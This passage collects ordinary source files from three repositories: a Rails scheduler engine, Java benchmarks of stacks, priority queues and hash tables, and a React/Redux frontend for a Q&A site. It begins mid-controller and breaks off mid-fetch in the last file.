authorize! :estimate, project
extended_attributes["estimated_effort"] = params[:estimatedEffort]
end
if params.key?(:estimatedValue)
authorize! :prioritize, project
extended_attributes["estimated_value"] = params[:estimatedValue]
end
if params.key?(:unableToSetEstimatedEffort)
authorize! :estimate, project
extended_attributes["unable_to_set_estimated_effort"] = params[:unableToSetEstimatedEffort]
end
if params.key?(:unableToSetEstimatedValue)
authorize! :prioritize, project
extended_attributes["unable_to_set_estimated_value"] = params[:unableToSetEstimatedValue]
end
if ticket.update_attributes(extended_attributes: extended_attributes)
render json: [], :status => :ok
else
render json: ticket.errors, :status => :unprocessable_entity
end
end
def update_order
@project = Project.find_by_slug!(params[:slug])
ids = Array.wrap(params[:order]).map(&:to_i).reject(&:zero?)
if ids.length > 0
Ticket.transaction do
project.tickets.where(Ticket.arel_table[:id].not_in(ids))
.update_all("extended_attributes = extended_attributes || 'sequence=>NULL'::hstore")
ids.each_with_index do |id, i|
Ticket.where(id: id).update_all("extended_attributes = extended_attributes || 'sequence=>#{i+1}'::hstore")
end
end
elsif params[:order] == "empty"
project.tickets.update_all("extended_attributes = extended_attributes || 'sequence=>NULL'::hstore")
end
head :ok
end
attr_reader :ticket, :project
end
end
end
<file_sep>Rails.application.routes.draw do
mount Houston::Scheduler::Engine => "/houston-scheduler"
end
<file_sep>Houston::Scheduler::Engine.routes.draw do
root :to => "scheduler#index", :as => :demo
get "mixer", :to => "mixer#index", :as => :mixer
put "mixer", :to => "mixer#update"
get "by_project/:slug", :to => "scheduler#project", :as => :project
put "by_project/:slug/ticket_order", :to => "tickets#update_order"
put "tickets/:id", :to => "tickets#update", constraints: {id: /\d+/}
end
<file_sep>require 'houston/scheduler/engine'
module Houston
module Scheduler
extend self
def menu_items_for(context={})
projects = context[:projects]
ability = context[:ability]
user = context[:user]
projects = projects.select { |project| ability.can?(:read, project) }
return [] if projects.empty?
menu_items = []
menu_items << MenuItem.new("Mixer", Engine.routes.url_helpers.mixer_path)
menu_items << MenuItem.new("Demo", Engine.routes.url_helpers.demo_path) if user.administrator?
menu_items << MenuItemDivider.new
menu_items.concat projects.map { |project| ProjectMenuItem.new(project, Engine.routes.url_helpers.project_path(project)) }
menu_items
end
end
end
<file_sep>$:.push File.expand_path("../lib", __FILE__)
# Maintain your gem's version:
require "houston/scheduler/version"
# Describe your gem and declare its dependencies:
Gem::Specification.new do |s|
s.name = "houston-scheduler"
s.version = Houston::Scheduler::VERSION
s.authors = ["<NAME>"]
s.email = ["<EMAIL>"]
s.homepage = "https://github.com/houstonmc/houston-scheduler"
s.summary = "A module for Houston that projects schedules for work based on information about tasks' effort and payoff."
s.description = "Given effort and value of to-do list items, Houston::Scheduler employs different strategies for sequencing work. Then it projects a schedule based on your Work-in-Progress constraints"
s.files = Dir["{app,config,db,lib}/**/*"] + ["LICENSE.txt", "Rakefile", "README.md"]
s.test_files = Dir["test/**/*"]
s.add_dependency "rails", "~> 3.2.9"
s.add_dependency "sass-rails", "~> 3.2.3"
s.add_dependency "coffee-rails", "~> 3.2.1"
s.add_dependency "handlebars_assets"
# s.add_dependency "jquery-rails"
s.add_development_dependency "sqlite3"
s.add_development_dependency "konacha"
s.add_development_dependency "poltergeist"
end
<file_sep># Houston::Scheduler
A module for Houston that projects schedules for work based on information about tasks' effort and payoff.
## Installation
In your [Houston](https://github.com/houstonmc/houston) `config/config.rb` file, add:
use :scheduler
And then execute:
$ bundle
Run Houston and you can navigate to the scheduler at the path '/scheduler'
## Usage
TODO: Write usage instructions here
## Contributing
1. Fork it
2. Create your feature branch (`git checkout -b my-new-feature`)
3. Commit your changes (`git commit -am 'Add some feature'`)
4. Push to the branch (`git push origin my-new-feature`)
5. Create new Pull Request
<file_sep>#!/usr/bin/env rake
begin
require 'bundler/setup'
rescue LoadError
puts 'You must `gem install bundler` and `bundle install` to run rake tasks'
end
begin
require 'rdoc/task'
rescue LoadError
require 'rdoc/rdoc'
require 'rake/rdoctask'
RDoc::Task = Rake::RDocTask
end
task 'load_app' do
# load_app is defined and invoked in engine.rake, below
# we have to sneak in our additions so konacha is loaded.
require 'action_controller/railtie'
require 'konacha'
load 'tasks/konacha.rake'
module Konacha
def self.spec_root
Houston::Scheduler::Engine.config.root + config.spec_dir
end
end
class Konacha::Engine
initializer "konacha.engine.environment", after: "konacha.environment" do
# Rails.application is the dummy app in test/dummy
Rails.application.config.assets.paths << Houston::Scheduler::Engine.config.root + Konacha.config.spec_dir
end
end
require 'capybara/poltergeist'
Konacha.configure do |config|
config.driver = :poltergeist
end if defined?(Konacha)
end
APP_RAKEFILE = File.expand_path("../test/dummy/Rakefile", __FILE__)
load 'rails/tasks/engine.rake'
Bundler::GemHelper.install_tasks
require 'rake/testtask'
Rake::TestTask.new(:test) do |t|
t.libs << 'lib'
t.libs << 'test'
t.pattern = 'test/**/*_test.rb'
t.verbose = false
end
task :default => :test
<file_sep>module Houston
module Scheduler
class Engine < ::Rails::Engine
isolate_namespace Houston::Scheduler
# Enabling assets precompiling under rails 3.1
if Rails.version >= '3.1'
initializer :assets do |config|
Rails.application.config.assets.precompile += %w( houston-scheduler/application.js houston-scheduler/application.css )
end
end
end
end
end
<file_sep># To-Do
- Allow specifing prerequisites for tickets
- Calculate prerequisites/dependencies when applying Queuing Discipline
- **Scheduler:** Click to edit ticket in a popup
- Allow estimating only be certain users/roles
- Allow custom queueing disciplines
<file_sep>require 'test_helper'
class HoustonSchedulerTest < ActiveSupport::TestCase
test "truth" do
assert_kind_of Module, Houston::Scheduler
end
end
| 42186a9eccbd270ae32a5f994dfae4ef675c9cbf | [
"Markdown",
"Ruby"
] | 10 | Ruby | lukebooth/houston-scheduler | afa397dddd4d1cb1858e86ed483e5f8fe1a617dd | 92c98916950f4dbf9aee95cfcadd95c49b60d207 |
refs/heads/master | <file_sep>package com.tiago.melo.estruturas;
import java.util.Enumeration;
import java.util.Hashtable;
import java.util.UUID;
import com.tiago.melo.estruturas.utils.Pessoa;
import com.tiago.melo.estruturas.utils.Utils;
import com.tiago.melo.interfaces.TestaEstrutura;
public class TesteTabelaHash implements TestaEstrutura {

	/**
	 * Populates a {@link Hashtable} whose keys are random UUID strings and whose
	 * values are the insertion indexes, prints every key/value pair and logs the
	 * total execution time through {@link Utils#criaLogDeExecucao(String)}.
	 *
	 * @param tamanho number of entries to insert into the table
	 */
	@Override
	public void geraEstruturaDefault(int tamanho) {
		long start = System.currentTimeMillis();

		Hashtable<String, Integer> numbers = new Hashtable<String, Integer>();
		for (int i = 0; i < tamanho; i++) {
			numbers.put(UUID.randomUUID().toString(), i);
		}

		Enumeration<String> elements = numbers.keys();
		while (elements.hasMoreElements()) {
			System.out.println("--------");
			String key = elements.nextElement();
			System.out.println("Key = " + key);
			System.out.println("Value = " + numbers.get(key));
		}

		registraTempoDeExecucao("geraEstruturaDefault", start);
	}

	/**
	 * Same experiment as {@link #geraEstruturaDefault(int)} but stores a custom
	 * {@link Pessoa} value per key instead of a plain {@link Integer}.
	 *
	 * @param tamanho number of entries to insert into the table
	 */
	@Override
	public void geraEstruturaCustomizada(int tamanho) {
		long start = System.currentTimeMillis();

		Hashtable<String, Pessoa> numbers = new Hashtable<String, Pessoa>();
		for (int i = 0; i < tamanho; i++) {
			String randomStr = UUID.randomUUID().toString();
			numbers.put(randomStr, new Pessoa(i, randomStr));
		}

		Enumeration<String> elements = numbers.keys();
		while (elements.hasMoreElements()) {
			System.out.println("--------");
			String key = elements.nextElement();
			System.out.println("Key = " + key);
			System.out.println("Value = " + numbers.get(key));
		}

		registraTempoDeExecucao("geraEstruturaCustomizada", start);
	}

	/**
	 * Empty stub kept only to satisfy the {@link TestaEstrutura} contract.
	 */
	@Override
	public void adicionaTempoDeExecucao() {
		// TODO Auto-generated method stub
	}

	/**
	 * Prints and logs the elapsed time of a test method. Extracted to remove the
	 * timing/logging code that was duplicated in both test methods above; the
	 * produced message is identical to the previous inline version.
	 *
	 * @param metodo name of the measured method, embedded in the message
	 * @param start  timestamp (millis) captured at the start of the method
	 */
	private void registraTempoDeExecucao(String metodo, long start) {
		long finish = System.currentTimeMillis();
		String mensagem = "Tempo de execução do método " + metodo + ": " + (finish - start);
		System.out.println(mensagem);
		Utils.criaLogDeExecucao(mensagem);
	}

}
<file_sep>package com.tiago.melo.estruturas.utils;
import java.io.BufferedWriter;
import java.io.FileOutputStream;
import java.io.IOException;
import java.io.OutputStreamWriter;
import java.io.PrintWriter;
import java.nio.file.DirectoryNotEmptyException;
import java.nio.file.FileSystems;
import java.nio.file.Files;
import java.nio.file.NoSuchFileException;
import java.nio.file.Path;
public class Utils {

	// Global flag callers may toggle to control structure printing; not read
	// inside this class.
	public static boolean imprimeEstrutura = false;

	// Single log file shared by every structure test.
	static String fileName = "log.txt";

	/**
	 * Appends one line to the execution log file, creating the file first when
	 * it does not exist. I/O failures are reported to stderr and swallowed so a
	 * logging problem never aborts a running test.
	 *
	 * @param conteudo line to append to the log
	 */
	public static void criaLogDeExecucao(String conteudo) {
		try (PrintWriter out = new PrintWriter(
				new BufferedWriter(new OutputStreamWriter(new FileOutputStream(fileName, true))))) {
			out.println(conteudo);
		} catch (IOException e) {
			System.err.println("Exceção ao criar arquivo.");
		}
		System.out.println("Arquivo de log criado!");
	}

	/**
	 * Deletes the execution log file if it exists; failures are reported to
	 * stderr and swallowed.
	 */
	public static void apagaLogDeExecucao() {
		// Fix: resolve the path from the shared fileName field so creation and
		// deletion always target the same file (this was hard-coded to
		// "log.txt" while the error messages below already used fileName).
		Path path = FileSystems.getDefault().getPath(fileName);

		try {
			Files.deleteIfExists(path);
		} catch (NoSuchFileException x) {
			System.err.format("%s: no such" + " file or directory%n", fileName);
		} catch (DirectoryNotEmptyException x) {
			System.err.format("%s not empty%n", fileName);
		} catch (IOException x) {
			// File permission problems are caught here.
			System.err.println(x);
		}

		System.out.println("Arquivo de log apagado!");
	}

}
<file_sep># trabalho_algoritmo
Trabalho do MPCOMP de algoritmos e estrutura de dados. Utilizar estrutura de dados lista encadeada, fila de prioridade, pilha, tabela hash e verificar seu desempenho.
<file_sep>package com.tiago.melo.interfaces;
/**
 * Contract for the data-structure benchmark classes (linked list, stack,
 * priority queue, hash table): each implementation builds the structure,
 * exercises it, and records execution time via Utils.
 */
public interface TestaEstrutura {
/**
 * Builds and exercises the structure using plain Integer elements.
 *
 * @param tamanho size of the generated structure
 */
public void geraEstruturaDefault(int tamanho);
/**
 * Builds and exercises the structure using the custom Pessoa type.
 *
 * @param tamanho size of the generated structure
 */
public void geraEstruturaCustomizada(int tamanho);
/**
 * Hook for accumulating execution times; currently a stub in all
 * implementations in this project.
 */
public void adicionaTempoDeExecucao();
}
<file_sep>package com.tiago.melo.estruturas;
import java.util.LinkedList;
import java.util.Queue;
import java.util.UUID;
import com.tiago.melo.estruturas.utils.Pessoa;
import com.tiago.melo.estruturas.utils.Utils;
import com.tiago.melo.interfaces.TestaEstrutura;
/**
 * Benchmarks a stack (pilha): pushes {@code tamanho} elements and then pops
 * until empty, timing the whole run.
 *
 * Fixed: the original used {@code Queue.add}/{@code remove} on a LinkedList,
 * i.e. FIFO semantics — it benchmarked a queue, not the stack this class (and
 * the project README) claims to test. LinkedList implements Deque, so
 * {@code push}/{@code pop} give true LIFO behavior without new imports.
 * Also fixed an off-by-one: {@code indice >= 0} inserted tamanho + 1
 * elements, unlike the other benchmark classes which insert exactly tamanho.
 */
public class TestePilha implements TestaEstrutura {

	/**
	 * Pushes {@code tamanho} Integers onto a stack, pops and prints them
	 * all, then reports the elapsed time to stdout and the log file.
	 *
	 * @param tamanho number of elements pushed
	 */
	@Override
	public void geraEstruturaDefault(int tamanho) {
		long start = System.currentTimeMillis();
		// LinkedList used through its Deque face: push/pop are LIFO.
		LinkedList<Integer> pilha = new LinkedList<Integer>();
		for (int indice = 0; indice < tamanho; indice++)
			pilha.push(indice);
		while (!pilha.isEmpty()) {
			System.out.println(pilha.pop());
		}
		long finish = System.currentTimeMillis();
		System.out.println("Tempo de execução do método geraEstruturaDefault: " + (finish - start));
		Utils.criaLogDeExecucao("Tempo de execução do método geraEstruturaDefault: " + (finish - start));
	}

	/**
	 * Same benchmark with custom Pessoa elements (random UUID names).
	 *
	 * @param tamanho number of elements pushed
	 */
	@Override
	public void geraEstruturaCustomizada(int tamanho) {
		long start = System.currentTimeMillis();
		LinkedList<Pessoa> pilha = new LinkedList<Pessoa>();
		for (int i = 0; i < tamanho; i++)
			pilha.push(new Pessoa(i, UUID.randomUUID().toString()));
		while (!pilha.isEmpty()) {
			System.out.println(pilha.pop());
		}
		long finish = System.currentTimeMillis();
		System.out.println("Tempo de execução do método geraEstruturaCustomizada: " + (finish - start));
		Utils.criaLogDeExecucao("Tempo de execução do método geraEstruturaCustomizada: " + (finish - start));
	}

	/** Not implemented: stub required by the TestaEstrutura interface. */
	@Override
	public void adicionaTempoDeExecucao() {
		// TODO Auto-generated method stub
	}
}
<file_sep>package com.tiago.melo.estruturas;
import java.util.Comparator;
import java.util.PriorityQueue;
import java.util.Queue;
import java.util.Random;
import com.tiago.melo.estruturas.utils.Pessoa;
import com.tiago.melo.estruturas.utils.Utils;
import com.tiago.melo.interfaces.TestaEstrutura;
/**
 * Benchmarks a priority queue: inserts elements with random priorities and
 * then drains the queue in priority order, timing the whole run.
 */
public class TesteFilaDePrioridades implements TestaEstrutura {

	/**
	 * Fills the queue with {@code tamanho} Pessoa objects whose ids (and
	 * hence priorities) are random ints in [0, 100).
	 *
	 * @param customerPriorityQueue queue to populate
	 * @param tamanho               number of elements to insert
	 */
	private static void adicionaDadosNaFila(Queue<Pessoa> customerPriorityQueue, int tamanho) {
		Random rand = new Random();
		for (int i = 0; i < tamanho; i++) {
			int id = rand.nextInt(100);
			customerPriorityQueue.add(new Pessoa(id, "Tiago" + id));
		}
	}

	/**
	 * Drains the queue, printing each Pessoa's id in priority order.
	 * poll() returns null once the queue is empty, which ends the loop.
	 *
	 * @param customerPriorityQueue queue to drain
	 */
	private static void pollDataFromQueue(Queue<Pessoa> customerPriorityQueue) {
		while (true) {
			Pessoa cust = customerPriorityQueue.poll();
			if (cust == null)
				break;
			System.out.println("Processando Pessoa com ID = " + cust.getId());
		}
	}

	/**
	 * Benchmarks a PriorityQueue of Integers: inserts {@code tamanho} random
	 * values, drains them in ascending order, and logs the elapsed time.
	 *
	 * @param tamanho number of elements inserted
	 */
	@Override
	public void geraEstruturaDefault(int tamanho) {
		long start = System.currentTimeMillis();
		Queue<Integer> integerPriorityQueue = new PriorityQueue<>(tamanho);
		Random rand = new Random();
		for (int indice = 0; indice < tamanho; indice++) {
			// Fixed: the deprecated new Integer(...) constructor; valueOf
			// uses the Integer cache and is the idiomatic boxing call.
			Integer randomInteger = Integer.valueOf(rand.nextInt(100));
			System.out.println("Adicionando: " + randomInteger);
			integerPriorityQueue.add(randomInteger);
		}
		for (int i = 0; i < tamanho; i++) {
			Integer in = integerPriorityQueue.poll();
			System.out.println("Processando inteiro:" + in);
		}
		long finish = System.currentTimeMillis();
		// Fixed: log strings were copy-pasted from the hash-table benchmark
		// and reported the wrong method name.
		System.out.println("Tempo de execução do método geraEstruturaDefault: " + (finish - start));
		Utils.criaLogDeExecucao("Tempo de execução do método geraEstruturaDefault: " + (finish - start));
	}

	/**
	 * Same benchmark with custom Pessoa elements ordered by id via
	 * {@link #idComparator}.
	 *
	 * @param tamanho number of elements inserted
	 */
	@Override
	public void geraEstruturaCustomizada(int tamanho) {
		long start = System.currentTimeMillis();
		// Fila de prioridade com comparador
		Queue<Pessoa> customerPriorityQueue = new PriorityQueue<>(idComparator);
		adicionaDadosNaFila(customerPriorityQueue, tamanho);
		pollDataFromQueue(customerPriorityQueue);
		long finish = System.currentTimeMillis();
		// Fixed: same wrong-method-name copy-paste as above.
		System.out.println("Tempo de execução do método geraEstruturaCustomizada: " + (finish - start));
		Utils.criaLogDeExecucao("Tempo de execução do método geraEstruturaCustomizada: " + (finish - start));
	}

	/** Orders Pessoa instances by ascending id. */
	public static Comparator<Pessoa> idComparator = new Comparator<Pessoa>() {
		@Override
		public int compare(Pessoa c1, Pessoa c2) {
			// Fixed: subtraction-based comparison can overflow for extreme
			// ids; Integer.compare is overflow-safe.
			return Integer.compare(c1.getId(), c2.getId());
		}
	};

	/** Not implemented: stub required by the TestaEstrutura interface. */
	@Override
	public void adicionaTempoDeExecucao() {
		// TODO Auto-generated method stub
	}
}
<file_sep>package com.tiago.melo.estruturas.utils;
/**
 * Simple value type used by the data-structure benchmarks: an id plus a
 * display name.
 */
public class Pessoa {

	/** Numeric identifier; also used as priority in the queue benchmark. */
	private int id;

	/** Display name. */
	private String nome;

	/**
	 * @param i    numeric identifier
	 * @param nome display name
	 */
	public Pessoa(int i, String nome) {
		this.id = i;
		this.nome = nome;
	}

	/** @return the numeric identifier */
	public int getId() {
		return id;
	}

	/** @return the display name */
	public String getNome() {
		return nome;
	}

	/**
	 * Misspelled accessor kept so existing callers keep compiling.
	 *
	 * @return the display name
	 * @deprecated use {@link #getNome()} instead
	 */
	@Deprecated
	public String getNaome() {
		return getNome();
	}

	@Override
	public String toString() {
		// Fixed: the original printed "nome" in both positions, so the id
		// never appeared in the output.
		return "id:" + id + ": nome: " + nome;
	}
}
| 68220c187496c881caa6c71acd7d57942cc5c4fe | [
"Markdown",
"Java"
] | 7 | Java | tiagotele/trabalho_algoritmo | e9b166bbf1b97dc5f7d61bdb0354fb3bb363ce21 | be21628e450bd84706ae9ab398b0514dc81cfdec |
refs/heads/master | <repo_name>koniferous22/npns-prototype-frontend<file_sep>/src/constants/content/profile/personalInformationPage.jsx
export const personalInformationPageConstants = {
REQUEST_FORM_FILLED: "PERSONAL_INFORMATION_PAGE_REQUEST_FORM_FILLED",
CONFIRM_PASSWORD_REQUEST: "PERSONAL_INFORMATION_PAGE_CONFIRM_PASSWORD_REQUEST",
CONFIRM_PASSWORD_FAILED: "PERSONAL_INFORMATION_PAGE_CONFIRM_PASSWORD_FAILED",
CHANGE_EMAIL_REQUEST: "PERSONAL_INFORMATION_PAGE_CHANGE_EMAIL_REQUEST",
CHANGE_EMAIL_SUCCESS: "PERSONAL_INFORMATION_PAGE_CHANGE_EMAIL_SUCCESS",
CHANGE_EMAIL_FAILED: "PERSONAL_INFORMATION_PAGE_CHANGE_EMAIL_FAILED",
CHANGE_PASSWORD_REQUEST: "PERSONAL_INFORMATION_PAGE_CHANGE_PASSWORD_REQUEST",
CHANGE_PASSWORD_SUCCESS: "PERSONAL_INFORMATION_PAGE_CHANGE_PASSWORD_SUCCESS",
CHANGE_PASSWORD_FAILED: "PERSONAL_INFORMATION_PAGE_CHANGE_PASSWORD_FAILED",
CHANGE_USERNAME_REQUEST: "PERSONAL_INFORMATION_PAGE_CHANGE_USERNAME_REQUEST",
CHANGE_USERNAME_SUCCESS: "PERSONAL_INFORMATION_PAGE_CHANGE_USERNAME_SUCCESS",
CHANGE_USERNAME_FAILED: "PERSONAL_INFORMATION_PAGE_CHANGE_USERNAME_FAILED",
CHANGE_NAMES_REQUEST: "PERSONAL_INFORMATION_PAGE_CHANGE_NAMES_REQUEST",
CHANGE_NAMES_SUCCESS: "PERSONAL_INFORMATION_PAGE_CHANGE_NAMES_SUCCESS",
CHANGE_NAMES_FAILED: "PERSONAL_INFORMATION_PAGE_CHANGE_NAMES_FAILED",
RESET: "PERSONAL_INFORMATION_PAGE_RESET"
}
export const personalInformationPageStages = {
SUBMITTING_FORM: 0,
PASSWORD_CONFIRMATION: 1,
COMPLETED: 2
}<file_sep>/src/reducers/content/statistics/scoreboardPage.jsx
import { combineReducers } from 'redux'
import { reducer } from 'redux-form'
import { scoreboardPageConstants } from '../../../constants/content/statistics/scoreboardPage'
const defaultQueueScoreboardState = {
data: [],
activePage: 1,
pageCount: 1,
userFlag: false,
highlight: null
}
const defaultState = {}
function singleScoreboardPageReducer(state=defaultQueueScoreboardState, action) {
switch(action.type) {
case scoreboardPageConstants.LOAD_PAGE_REQUEST:
return {
...state,
activePage: action.activePage,
message: 'Loading...',
messageType: action.messageType,
highlight: null,
userFlag: false
}
case scoreboardPageConstants.LOAD_PAGE_SUCCESS:
return {
...state,
data: action.data,
activePage: action.activePage,
message: '',
messageType: action.messageType,
highlight: null,
userFlag: false
}
case scoreboardPageConstants.LOAD_PAGE_FAILED:
return {
...state,
message: action.message,
messageType: action.messageType,
userFlag: false
}
case scoreboardPageConstants.USER_SEARCH_REQUEST:
return {
...state,
message: 'Loading...',
messageType: action.messageType
}
case scoreboardPageConstants.USER_SEARCH_SUCCESS:
return {
...state,
activePage: action.activePage,
userFlag: true,
message: null,
messageType: action.messageType,
highlight: action.username
}
case scoreboardPageConstants.USER_SEARCH_FAILED:
return {
...state,
message: action.message,
messageType: action.messageType
}
case scoreboardPageConstants.USER_COUNT_REQUEST:
return {
...state,
message: 'Loading...',
messageType: action.messageType
}
case scoreboardPageConstants.USER_COUNT_SUCCESS:
return {
...state,
pageCount: action.pageCount,
}
case scoreboardPageConstants.USER_COUNT_FAILED:
return {
...state,
message: action.message,
messageType: action.messageType
}
default:
return state
}
}
function scoreboardPageReducer(state = defaultState, action) {
if (action.type === scoreboardPageConstants.RESET) {
return defaultState
}
const newState = {...state}
if (action.queue) {
newState[action.queue] = singleScoreboardPageReducer(state[action.queue] || defaultQueueScoreboardState, action)
}
return newState
}
const scoreboardSearchFormReducer = reducer
export default combineReducers({
page: scoreboardPageReducer,
form: scoreboardSearchFormReducer
})
<file_sep>/src/styled-components/problem/ProblemBox.jsx
// IMPORTANT HAVE TO REFACTOR NAMES, CUZ THIS WILL BE CONFUSED WITH PROBELM BOX ON QUEUE PAGE
import React from 'react'
import styled from 'styled-components';
import ThemeSelector from '../ThemeSelector'
const BuzzfeedProblemBox = styled.div`
border-radius: 10px;
padding: 10px;
h3 {
margin-top: 0;
}
background-color: rgba(67, 0, 50, 0.7);
`
const TryhardProblemBox = props => <div {...props}/>
const ProblemBox = props => <ThemeSelector
buzzfeed={<BuzzfeedProblemBox {...props} />}
tryhard={<TryhardProblemBox {...props} />}
/>
export default ProblemBox<file_sep>/src/styled-components/sidebars/HierarchicalListDiv.jsx
import React from 'react'
import styled from 'styled-components';
import ThemeSelector from '../ThemeSelector'
const BuzzfeedHierarchicalListDiv = styled.div`
ul {
position: relative;
padding-inline-start: 20px;
}
padding-left: 20px;
`
const TryhardHierarchicalListDiv = props => <div {...props} />
const HierarchicalListDiv = props => <ThemeSelector
buzzfeed={<BuzzfeedHierarchicalListDiv {...props} />}
tryhard={<TryhardHierarchicalListDiv {...props} />}
/>
export default HierarchicalListDiv<file_sep>/src/components/confirm/Registration.jsx
import React from 'react';
import { connect } from 'react-redux'
import { Link } from 'react-router-dom'
import { confirmRegistrationActions } from '../../actions/content/confirm/registration'
import ContentDiv from '../../styled-components/defaults/ContentDiv'
import BackendMessage from '../../styled-components/defaults/BackendMessage'
const mapStateToProps = state => state.content.confirm.registration
const mapDispatchToProps = dispatch => ({
confirm: token => dispatch(confirmRegistrationActions.confirm(token))
})
class ConfirmRegistrationPage extends React.Component {
componentDidMount() {
this.props.confirm(this.props.token)
}
render() {
return (
<ContentDiv>
<BackendMessage messageType={this.props.messageType}>
{this.props.message}
</BackendMessage>
{this.props.verified && (<p> Continue to <Link to='/login'>Login</Link> </p>)}
</ContentDiv>
)
}
}
export default connect(mapStateToProps, mapDispatchToProps)(ConfirmRegistrationPage)
<file_sep>/src/redux-store.jsx
import { createStore, applyMiddleware } from 'redux';
import thunkMiddleware from 'redux-thunk';
import { createLogger } from 'redux-logger';
import rootReducer from './reducers/root';
import { appConfig } from './appConfig'
const logger = createLogger();
const args = appConfig.enableLogger ? [thunkMiddleware, logger] : [thunkMiddleware]
export const store = createStore(
rootReducer,
applyMiddleware(
...args
)
);
<file_sep>/src/styled-components/sidebars/CollapsedSidebarDiv.jsx
import React from 'react'
import styled from 'styled-components';
import ThemeSelector from '../ThemeSelector'
//float: ${props => props.float || 'left'};
const BuzzfeedCollapsedSidebarDiv = styled.div`
display: flex;
flex-direction: column;
justify-content: center;
${props => props.width && `width: ${props.width};`}
${props => props.grow && 'flex-grow: 1;'}
${props => props.shrink && 'flex-shrink: 1;'}
vertical-align: middle;
padding: 10px;
color: #2d117f;
`
const TryhardCollapsedSidebarDiv = props => <div {...props} grow={undefined} shrink={undefined}/>
const CollapsedSidebarDiv = props => <ThemeSelector
buzzfeed={<BuzzfeedCollapsedSidebarDiv {...props} />}
tryhard={<TryhardCollapsedSidebarDiv {...props} />}
/>
export default CollapsedSidebarDiv<file_sep>/src/components/profile/PersonalInformationPage/ProfileUpdateDispatcher.jsx
import React from 'react'
import { personalInformationPageActions } from '../../../actions/content/profile/personalInformationPage'
import { connect } from 'react-redux'
const mapDispatchToProps = (dispatch, ownProps) => {
switch (ownProps.form) {
case 'email':
return {
send: () => dispatch(personalInformationPageActions.submitEmailChange(ownProps.values.email, ownProps.token))
}
case 'password':
return {
send: () => dispatch(personalInformationPageActions.submitPasswordChange(ownProps.user))
}
case 'username':
return {
send: () => dispatch(personalInformationPageActions.submitUsernameChange(ownProps.values.username, ownProps.token))
}
case 'names':
return {
send: () => dispatch(personalInformationPageActions.submitNamesChange(ownProps.values.firstName, ownProps.values.lastName, ownProps.token))
}
default:
return {
send: () => {throw new Error('wut?')}
}
}
}
class ProfileUpdateDispatcher extends React.Component {
componentDidMount() {
this.props.send()
}
render() {
return <div/>
}
}
export default connect(null, mapDispatchToProps)(ProfileUpdateDispatcher)<file_sep>/src/constants/content/confirm/passwordChange.jsx
export const confirmPasswordChangeConstants = {
VERIFY_REQUEST: "VERIFY_PASSWORD_CHANGE_REQUEST",
VERIFY_SUCCESS: "VERIFY_PASSWORD_CHANGE_SUCCESS",
VERIFY_FAILED: "VERIFY_PASSWORD_CHANGE_FAILED",
CONFIRM_REQUEST: "CONFIRM_PASSWORD_CHANGE_REQUEST",
CONFIRM_SUCCESS: "CONFIRM_PASSWORD_CHANGE_SUCCESS",
CONFIRM_FAILED: "CONFIRM_PASSWORD_CHANGE_FAILED",
RESET: "PASSWORD_CHANGE_RESET"
}
export const confirmPasswordChangeStages = {
INVALID_TOKEN: 0,
SUBMITTING_FORM: 1,
COMPLETED: 2
}<file_sep>/src/styled-components/header/Constants.jsx
export const headerStyleConstants = {
HEADER_COLLAPSE_LOGGED_IN_CAPTION: "750px"
}<file_sep>/src/components/queue/SubmitProblemPage.jsx
import React from 'react'
import { connect } from 'react-redux'
import { Link } from "react-router-dom"
import SubmitProblemForm from './SubmitProblemPage/SubmitProblemForm'
import { submitProblemActions } from '../../actions/content/submitProblem'
import { submitProblemStages } from '../../constants/content/submitProblemPage'
import MarkdownRender from '../form/MarkdownRender'
import ContentDiv from '../../styled-components/defaults/ContentDiv'
import CenteredDiv from '../../styled-components/defaults/CenteredDiv'
import BackendMessage from '../../styled-components/defaults/BackendMessage'
const mapStateToProps = state => state.content.submitProblem
const mapDispatchToProps = dispatch => ({
reset: () => dispatch(submitProblemActions.reset()),
fetchDropdownValues: () => dispatch(submitProblemActions.fetchDropdownValues())
})
class SubmitProblemPage extends React.Component {
componentDidMount() {
this.props.fetchDropdownValues()
}
componentWillUnmount() {
this.props.reset()
}
render() {
const page = this.props.page
const form = this.props.form.form
switch(page.stage) {
case submitProblemStages.COMPLETED:
return(
<ContentDiv>
<BackendMessage messageType={page.messageType}>
{page.message}
</BackendMessage>
<p>Would you like to check out <Link to={'/problem/' + page.problemId}>your submitted problem</Link> or the <Link to={'/q/' + page.queue}>{page.queue} queue</Link>?</p>
</ContentDiv>
)
case submitProblemStages.SUBMITTING_FORM:
default:
return(
<ContentDiv>
<CenteredDiv>
Submitting new problem
</CenteredDiv>
<SubmitProblemForm defaultQueue={this.props.urlQueue || 'Index'} token={this.props.token} queueOptions={page.queueOptions}/>
<CenteredDiv>
<BackendMessage messageType={page.messageType}>
{page.message}
</BackendMessage>
</CenteredDiv>
{
form && form.values && (
<div>
{(form.values.title || form.values.description) && <p>Preview</p>}
<h3>{form.values.title}</h3>
<MarkdownRender source={form.values.description} />
</div>
)
}
</ContentDiv>
)
}
}
}
export default connect(mapStateToProps, mapDispatchToProps)(SubmitProblemPage)
<file_sep>/src/actions/content/profile/premiumPage.jsx
import { premiumPageConstants } from '../../../constants/content/profile/premiumPage';
function subscribe() {
return {
type: premiumPageConstants.SUBSCRIBE
}
}
function unsubscribe() {
return {
type: premiumPageConstants.UNSUBSCRIBE
}
}
export const premiumPageActions = {
subscribe,
unsubscribe
}
<file_sep>/src/reducers/content/confirm.jsx
import { combineReducers } from 'redux'
import confirmRegistrationReducer from './confirm/registration'
import confirmEmailChangeReducer from './confirm/emailChange'
import confirmUsernameChangeReducer from './confirm/usernameChange'
import confirmPasswordChangeReducer from './confirm/passwordChange'
export default combineReducers({
registration: confirmRegistrationReducer,
emailChange: confirmEmailChangeReducer,
usernameChange: confirmUsernameChangeReducer,
passwordChange: confirmPasswordChangeReducer
})<file_sep>/src/reducers/content/confirm/usernameChange.jsx
import { confirmUsernameChangeConstants } from '../../../constants/content/confirm/usernameChange'
function confirmUsernameChangeReducer(state={}, action) {
switch (action.type) {
case confirmUsernameChangeConstants.REQUEST:
return {
message: "Waiting for server response",
messageType: action.messageType
}
case confirmUsernameChangeConstants.SUCCESS:
return {
message: "Username successfully changed",
messageType: action.messageType,
verified: true
}
case confirmUsernameChangeConstants.FAILED:
return {
message: action.message,
messageType: action.messageType,
verified: state.verified || false
}
default:
return state
}
}
export default confirmUsernameChangeReducer
<file_sep>/src/actions/global.jsx
import { globalConstants } from '../constants/global'
import { appConfig } from '../appConfig'
function hierarchy() {
return dispatch => {
dispatch(request())
fetch(appConfig.backendUrl + "/queue/hierarchy", {
method: 'GET',
headers: {
